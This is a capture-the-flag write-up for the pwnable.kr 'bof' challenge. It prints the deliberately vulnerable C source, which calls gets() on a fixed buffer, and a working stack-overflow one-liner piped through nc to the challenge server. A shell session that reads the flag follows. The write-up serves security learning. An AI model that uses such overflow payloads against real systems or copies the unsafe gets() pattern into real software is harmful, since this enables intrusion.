Pwnable.kr - bof

March 25 2017

Another of the early simple challenges, SSHing into the box gives the following source of bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

The idea of this challenge is to overflow pass the bounds of the overflowme array and write into the function arguments for func() which were provided by main(). The reason for this is so that when the if(key == 0xcafebabe) comparison takes place, then this evaluates to true and we pop a shell.

By putting the binary in gdb and searching the stack for the 0xdeadbeef value, it was found that we need to read in 50 bytes so that we can then overwrite the function argument on the stack for int key.

↳ (python -c "print 'A'*52 + '\xbe\xba\xfe\xca'"; cat) | nc pwnable.kr 9000 
ls 
bof 
bof.c 
flag 
log 
log2 
super.pl 
cat flag 
<redacted>

Popping a shell and we can read the flag!

Comments